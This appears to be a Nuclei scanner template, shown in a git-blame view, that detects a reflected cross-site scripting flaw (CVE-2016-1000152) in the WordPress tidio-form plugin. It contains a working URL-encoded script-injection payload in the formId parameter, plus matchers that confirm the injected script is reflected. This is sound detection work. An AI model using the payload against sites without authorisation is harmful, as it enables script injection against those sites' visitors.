nuclei-templates/cves/2016/CVE-2016-1000152.yaml

36 lines
938 B
YAML
Raw Normal View History

2021-07-21 22:57:54 +00:00
id: CVE-2016-1000152
info:
2021-07-22 12:34:36 +00:00
name: Tidio-form <= 1.0 - Reflected Cross-Site Scripting (XSS)
2021-07-21 22:57:54 +00:00
author: daffainfo
severity: medium
2021-07-22 12:23:22 +00:00
description: Reflected XSS in wordpress plugin tidio-form v1.0
2021-07-21 22:57:54 +00:00
reference: https://nvd.nist.gov/vuln/detail/CVE-2016-1000152
tags: cve,cve2016,wordpress,xss,wp-plugin
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.10
cve-id: CVE-2016-1000152
cwe-id: CWE-79
2021-07-21 22:57:54 +00:00
requests:
- method: GET
path:
2021-07-22 12:23:22 +00:00
- "{{BaseURL}}/wp-content/plugins/tidio-form/popup-insert-help.php?formId=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
2021-07-21 22:57:54 +00:00
matchers-condition: and
matchers:
- type: word
words:
2021-07-22 12:23:22 +00:00
- "</script><script>alert(document.domain)</script>"
2021-07-21 22:57:54 +00:00
part: body
- type: word
part: header
words:
- text/html
- type: status
status:
- 200